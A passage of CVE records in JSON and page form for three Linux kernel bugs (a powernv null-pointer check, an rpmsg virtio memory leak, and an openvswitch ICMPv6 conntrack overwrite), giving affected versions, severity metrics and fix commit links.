"status": "affected",
"version": "bfd2f0d49aef8abfe6bf58f12719f39912993cc6",
"versionType": "git"
},
{
"lessThan": "a9c05cbb6644a2103c75b6906e9dafb9981ebd13",
"status": "affected",
"version": "bfd2f0d49aef8abfe6bf58f12719f39912993cc6",
"versionType": "git"
},
{
"lessThan": "9a260f2dd827bbc82cc60eb4f4d8c22707d80742",
"status": "affected",
"version": "bfd2f0d49aef8abfe6bf58f12719f39912993cc6",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"arch/powerpc/platforms/powernv/opal-xscom.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.4"
},
{
"lessThan": "5.4",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.268",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.209",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.148",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.75",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.14",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.2",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.268",
"versionStartIncluding": "5.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.209",
"versionStartIncluding": "5.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.148",
"versionStartIncluding": "5.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.75",
"versionStartIncluding": "5.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.14",
"versionStartIncluding": "5.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.2",
"versionStartIncluding": "5.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "5.4",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\npowerpc/powernv: Add a null pointer check to scom_debug_init_one()\n\nkasprintf() returns a pointer to dynamically allocated memory\nwhich can be NULL upon failure.\nAdd a null pointer check, and release \u0027ent\u0027 to avoid memory leaks."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T07:41:42.077Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/f84c1446daa552e9699da8d1f8375eac0f65edc7"
},
{
"url": "https://git.kernel.org/stable/c/1eefa93faf69188540b08b024794fa90b1d82e8b"
},
{
"url": "https://git.kernel.org/stable/c/2a82c4439b903639e0a1f21990cd399fb0a49c19"
},
{
"url": "https://git.kernel.org/stable/c/ed8d023cfa97b559db58c0e1afdd2eec7a83d8f2"
},
{
"url": "https://git.kernel.org/stable/c/dd8422ff271c22058560832fc3006324ded895a9"
},
{
"url": "https://git.kernel.org/stable/c/a9c05cbb6644a2103c75b6906e9dafb9981ebd13"
},
{
"url": "https://git.kernel.org/stable/c/9a260f2dd827bbc82cc60eb4f4d8c22707d80742"
}
],
"title": "powerpc/powernv: Add a null pointer check to scom_debug_init_one()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2023-52690",
"datePublished": "2024-05-17T14:24:50.648Z",
"dateReserved": "2024-03-07T14:49:46.888Z",
"dateUpdated": "2025-05-04T07:41:42.077Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-52670 (GCVE-0-2023-52670)
Vulnerability from cvelistv5
Published
2024-05-17 14:02
Modified
2025-05-04 07:41
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
rpmsg: virtio: Free driver_override when rpmsg_remove()
Free driver_override when rpmsg_remove(), otherwise
the following memory leak will occur:
unreferenced object 0xffff0000d55d7080 (size 128):
comm "kworker/u8:2", pid 56, jiffies 4294893188 (age 214.272s)
hex dump (first 32 bytes):
72 70 6d 73 67 5f 6e 73 00 00 00 00 00 00 00 00 rpmsg_ns........
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
backtrace:
[<000000009c94c9c1>] __kmem_cache_alloc_node+0x1f8/0x320
[<000000002300d89b>] __kmalloc_node_track_caller+0x44/0x70
[<00000000228a60c3>] kstrndup+0x4c/0x90
[<0000000077158695>] driver_set_override+0xd0/0x164
[<000000003e9c4ea5>] rpmsg_register_device_override+0x98/0x170
[<000000001c0c89a8>] rpmsg_ns_register_device+0x24/0x30
[<000000008bbf8fa2>] rpmsg_probe+0x2e0/0x3ec
[<00000000e65a68df>] virtio_dev_probe+0x1c0/0x280
[<00000000443331cc>] really_probe+0xbc/0x2dc
[<00000000391064b1>] __driver_probe_device+0x78/0xe0
[<00000000a41c9a5b>] driver_probe_device+0xd8/0x160
[<000000009c3bd5df>] __device_attach_driver+0xb8/0x140
[<0000000043cd7614>] bus_for_each_drv+0x7c/0xd4
[<000000003b929a36>] __device_attach+0x9c/0x19c
[<00000000a94e0ba8>] device_initial_probe+0x14/0x20
[<000000003c999637>] bus_probe_device+0xa0/0xac
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: b0b03b8119633de0649da9bd506e4850c401ff2b Version: b0b03b8119633de0649da9bd506e4850c401ff2b Version: b0b03b8119633de0649da9bd506e4850c401ff2b Version: b0b03b8119633de0649da9bd506e4850c401ff2b Version: b0b03b8119633de0649da9bd506e4850c401ff2b Version: b0b03b8119633de0649da9bd506e4850c401ff2b Version: b0b03b8119633de0649da9bd506e4850c401ff2b Version: b0b03b8119633de0649da9bd506e4850c401ff2b |
||
{
"containers": {
"adp": [
{
"affected": [
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "229ce47cbfdc",
"status": "affected",
"version": "b0b03b811963",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "dd50fe18c234",
"status": "affected",
"version": "b0b03b811963",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "69ca89d80f2c",
"status": "affected",
"version": "b0b03b811963",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "2d27a7b19cb3",
"status": "affected",
"version": "b0b03b811963",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "f4bb1d5daf77",
"status": "affected",
"version": "b0b03b811963",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "4e6cef3fae5c",
"status": "affected",
"version": "b0b03b811963",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "9a416d624e5f",
"status": "affected",
"version": "b0b03b811963",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "d5362c37e1f8",
"status": "affected",
"version": "b0b03b811963",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"status": "affected",
"version": "4.13"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "4.13",
"status": "unaffected",
"version": "0",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThanOrEqual": "4.20",
"status": "unaffected",
"version": "4.19.307",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThanOrEqual": "5.5",
"status": "unaffected",
"version": "5.4269",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThanOrEqual": "5.11",
"status": "unaffected",
"version": "5.10.210",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThanOrEqual": "5.16",
"status": "unaffected",
"version": "5.15.149",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThanOrEqual": "6.2",
"status": "unaffected",
"version": "6.1.76",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThanOrEqual": "6.7",
"status": "unaffected",
"version": "6.6.15",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThanOrEqual": "6.8",
"status": "unaffected",
"version": "6.73",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"status": "unaffected",
"version": "6.8"
}
]
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "PHYSICAL",
"availabilityImpact": "HIGH",
"baseScore": 6.6,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2023-52670",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-06-06T20:01:16.725609Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-401",
"description": "CWE-401 Missing Release of Memory after Effective Lifetime",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-01-23T21:43:43.942Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T23:11:34.486Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/229ce47cbfdc7d3a9415eb676abbfb77d676cb08"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/dd50fe18c234bd5ff22f658f4d414e8fa8cd6a5d"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/69ca89d80f2c8a1f5af429b955637beea7eead30"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/2d27a7b19cb354c6d04bcdc9239e261ff29858d6"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f4bb1d5daf77b1a95a43277268adf0d1430c2346"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/4e6cef3fae5c164968118a13f3fe293700adc81a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/9a416d624e5fb7246ea97c11fbfea7e0e27abf43"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d5362c37e1f8a40096452fc201c30e705750e687"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/rpmsg/virtio_rpmsg_bus.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "229ce47cbfdc7d3a9415eb676abbfb77d676cb08",
"status": "affected",
"version": "b0b03b8119633de0649da9bd506e4850c401ff2b",
"versionType": "git"
},
{
"lessThan": "dd50fe18c234bd5ff22f658f4d414e8fa8cd6a5d",
"status": "affected",
"version": "b0b03b8119633de0649da9bd506e4850c401ff2b",
"versionType": "git"
},
{
"lessThan": "69ca89d80f2c8a1f5af429b955637beea7eead30",
"status": "affected",
"version": "b0b03b8119633de0649da9bd506e4850c401ff2b",
"versionType": "git"
},
{
"lessThan": "2d27a7b19cb354c6d04bcdc9239e261ff29858d6",
"status": "affected",
"version": "b0b03b8119633de0649da9bd506e4850c401ff2b",
"versionType": "git"
},
{
"lessThan": "f4bb1d5daf77b1a95a43277268adf0d1430c2346",
"status": "affected",
"version": "b0b03b8119633de0649da9bd506e4850c401ff2b",
"versionType": "git"
},
{
"lessThan": "4e6cef3fae5c164968118a13f3fe293700adc81a",
"status": "affected",
"version": "b0b03b8119633de0649da9bd506e4850c401ff2b",
"versionType": "git"
},
{
"lessThan": "9a416d624e5fb7246ea97c11fbfea7e0e27abf43",
"status": "affected",
"version": "b0b03b8119633de0649da9bd506e4850c401ff2b",
"versionType": "git"
},
{
"lessThan": "d5362c37e1f8a40096452fc201c30e705750e687",
"status": "affected",
"version": "b0b03b8119633de0649da9bd506e4850c401ff2b",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/rpmsg/virtio_rpmsg_bus.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.13"
},
{
"lessThan": "4.13",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.307",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.269",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.210",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.149",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.76",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.15",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.307",
"versionStartIncluding": "4.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.269",
"versionStartIncluding": "4.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.210",
"versionStartIncluding": "4.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.149",
"versionStartIncluding": "4.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.76",
"versionStartIncluding": "4.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.15",
"versionStartIncluding": "4.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.3",
"versionStartIncluding": "4.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "4.13",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nrpmsg: virtio: Free driver_override when rpmsg_remove()\n\nFree driver_override when rpmsg_remove(), otherwise\nthe following memory leak will occur:\n\nunreferenced object 0xffff0000d55d7080 (size 128):\n comm \"kworker/u8:2\", pid 56, jiffies 4294893188 (age 214.272s)\n hex dump (first 32 bytes):\n 72 70 6d 73 67 5f 6e 73 00 00 00 00 00 00 00 00 rpmsg_ns........\n 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\n backtrace:\n [\u003c000000009c94c9c1\u003e] __kmem_cache_alloc_node+0x1f8/0x320\n [\u003c000000002300d89b\u003e] __kmalloc_node_track_caller+0x44/0x70\n [\u003c00000000228a60c3\u003e] kstrndup+0x4c/0x90\n [\u003c0000000077158695\u003e] driver_set_override+0xd0/0x164\n [\u003c000000003e9c4ea5\u003e] rpmsg_register_device_override+0x98/0x170\n [\u003c000000001c0c89a8\u003e] rpmsg_ns_register_device+0x24/0x30\n [\u003c000000008bbf8fa2\u003e] rpmsg_probe+0x2e0/0x3ec\n [\u003c00000000e65a68df\u003e] virtio_dev_probe+0x1c0/0x280\n [\u003c00000000443331cc\u003e] really_probe+0xbc/0x2dc\n [\u003c00000000391064b1\u003e] __driver_probe_device+0x78/0xe0\n [\u003c00000000a41c9a5b\u003e] driver_probe_device+0xd8/0x160\n [\u003c000000009c3bd5df\u003e] __device_attach_driver+0xb8/0x140\n [\u003c0000000043cd7614\u003e] bus_for_each_drv+0x7c/0xd4\n [\u003c000000003b929a36\u003e] __device_attach+0x9c/0x19c\n [\u003c00000000a94e0ba8\u003e] device_initial_probe+0x14/0x20\n [\u003c000000003c999637\u003e] bus_probe_device+0xa0/0xac"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T07:41:13.808Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/229ce47cbfdc7d3a9415eb676abbfb77d676cb08"
},
{
"url": "https://git.kernel.org/stable/c/dd50fe18c234bd5ff22f658f4d414e8fa8cd6a5d"
},
{
"url": "https://git.kernel.org/stable/c/69ca89d80f2c8a1f5af429b955637beea7eead30"
},
{
"url": "https://git.kernel.org/stable/c/2d27a7b19cb354c6d04bcdc9239e261ff29858d6"
},
{
"url": "https://git.kernel.org/stable/c/f4bb1d5daf77b1a95a43277268adf0d1430c2346"
},
{
"url": "https://git.kernel.org/stable/c/4e6cef3fae5c164968118a13f3fe293700adc81a"
},
{
"url": "https://git.kernel.org/stable/c/9a416d624e5fb7246ea97c11fbfea7e0e27abf43"
},
{
"url": "https://git.kernel.org/stable/c/d5362c37e1f8a40096452fc201c30e705750e687"
}
],
"title": "rpmsg: virtio: Free driver_override when rpmsg_remove()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2023-52670",
"datePublished": "2024-05-17T14:02:01.617Z",
"dateReserved": "2024-03-07T14:49:46.885Z",
"dateUpdated": "2025-05-04T07:41:13.808Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-38558 (GCVE-0-2024-38558)
Vulnerability from cvelistv5
Published
2024-06-19 13:35
Modified
2025-11-04 17:21
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
net: openvswitch: fix overwriting ct original tuple for ICMPv6
OVS_PACKET_CMD_EXECUTE has 3 main attributes:
- OVS_PACKET_ATTR_KEY - Packet metadata in a netlink format.
- OVS_PACKET_ATTR_PACKET - Binary packet content.
- OVS_PACKET_ATTR_ACTIONS - Actions to execute on the packet.
OVS_PACKET_ATTR_KEY is parsed first to populate sw_flow_key structure
with the metadata like conntrack state, input port, recirculation id,
etc. Then the packet itself gets parsed to populate the rest of the
keys from the packet headers.
Whenever the packet parsing code starts parsing the ICMPv6 header, it
first zeroes out fields in the key corresponding to Neighbor Discovery
information even if it is not an ND packet.
It is an 'ipv6.nd' field. However, the 'ipv6' is a union that shares
the space between 'nd' and 'ct_orig' that holds the original tuple
conntrack metadata parsed from the OVS_PACKET_ATTR_KEY.
ND packets should not normally have conntrack state, so it's fine to
share the space, but normal ICMPv6 Echo packets or maybe other types of
ICMPv6 can have the state attached and it should not be overwritten.
The issue results in all but the last 4 bytes of the destination
address being wiped from the original conntrack tuple leading to
incorrect packet matching and potentially executing wrong actions
in case this packet recirculates within the datapath or goes back
to userspace.
ND fields should not be accessed in non-ND packets, so not clearing
them should be fine. Executing memset() only for actual ND packets to
avoid the issue.
Initializing the whole thing before parsing is needed because ND packet
may not contain all the options.
The issue only affects the OVS_PACKET_CMD_EXECUTE path and doesn't
affect packets entering OVS datapath from network interfaces, because
in this case CT metadata is populated from skb after the packet is
already parsed.
References
| URL | Tags | ||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 9dd7f8907c3705dc7a7a375d1c6e30b06e6daffc Version: 9dd7f8907c3705dc7a7a375d1c6e30b06e6daffc Version: 9dd7f8907c3705dc7a7a375d1c6e30b06e6daffc Version: 9dd7f8907c3705dc7a7a375d1c6e30b06e6daffc Version: 9dd7f8907c3705dc7a7a375d1c6e30b06e6daffc Version: 9dd7f8907c3705dc7a7a375d1c6e30b06e6daffc Version: 9dd7f8907c3705dc7a7a375d1c6e30b06e6daffc Version: 9dd7f8907c3705dc7a7a375d1c6e30b06e6daffc Version: 9dd7f8907c3705dc7a7a375d1c6e30b06e6daffc |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-38558",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-06-24T18:25:00.443395Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-24T18:25:07.878Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2025-11-04T17:21:25.696Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/6a51ac92bf35d34b4996d6eb67e2fe469f573b11"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/0b532f59437f688563e9c58bdc1436fefa46e3b5"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/5ab6aecbede080b44b8e34720ab72050bf1e6982"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/483eb70f441e2df66ade78aa7217e6e4caadfef3"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/9ec8b0ccadb908d92f7ee211a4eff05fd932f3f6"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/78741b4caae1e880368cb2f5110635f3ce45ecfd"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/431e9215576d7b728f3f53a704d237a520092120"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d73fb8bddf89503c9fae7c42e50d44c89909aad6"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/7c988176b6c16c516474f6fceebe0f055af5eb56"
},
{
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/openvswitch/flow.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "6a51ac92bf35d34b4996d6eb67e2fe469f573b11",
"status": "affected",
"version": "9dd7f8907c3705dc7a7a375d1c6e30b06e6daffc",
"versionType": "git"
},
{
"lessThan": "0b532f59437f688563e9c58bdc1436fefa46e3b5",
"status": "affected",
"version": "9dd7f8907c3705dc7a7a375d1c6e30b06e6daffc",
"versionType": "git"
},
{
"lessThan": "5ab6aecbede080b44b8e34720ab72050bf1e6982",
"status": "affected",
"version": "9dd7f8907c3705dc7a7a375d1c6e30b06e6daffc",
"versionType": "git"
},
{
"lessThan": "483eb70f441e2df66ade78aa7217e6e4caadfef3",
"status": "affected",
"version": "9dd7f8907c3705dc7a7a375d1c6e30b06e6daffc",
"versionType": "git"
},
{
"lessThan": "9ec8b0ccadb908d92f7ee211a4eff05fd932f3f6",
"status": "affected",
"version": "9dd7f8907c3705dc7a7a375d1c6e30b06e6daffc",
"versionType": "git"
},
{
"lessThan": "78741b4caae1e880368cb2f5110635f3ce45ecfd",
"status": "affected",
"version": "9dd7f8907c3705dc7a7a375d1c6e30b06e6daffc",
"versionType": "git"
},
{
"lessThan": "431e9215576d7b728f3f53a704d237a520092120",
"status": "affected",
"version": "9dd7f8907c3705dc7a7a375d1c6e30b06e6daffc",
"versionType": "git"
},
{
"lessThan": "d73fb8bddf89503c9fae7c42e50d44c89909aad6",
"status": "affected",
"version": "9dd7f8907c3705dc7a7a375d1c6e30b06e6daffc",
"versionType": "git"
},
{
"lessThan": "7c988176b6c16c516474f6fceebe0f055af5eb56",
"status": "affected",
"version": "9dd7f8907c3705dc7a7a375d1c6e30b06e6daffc",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/openvswitch/flow.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.11"
},
{
"lessThan": "4.11",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.316",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.278",
"versionType": "semver"
},
{
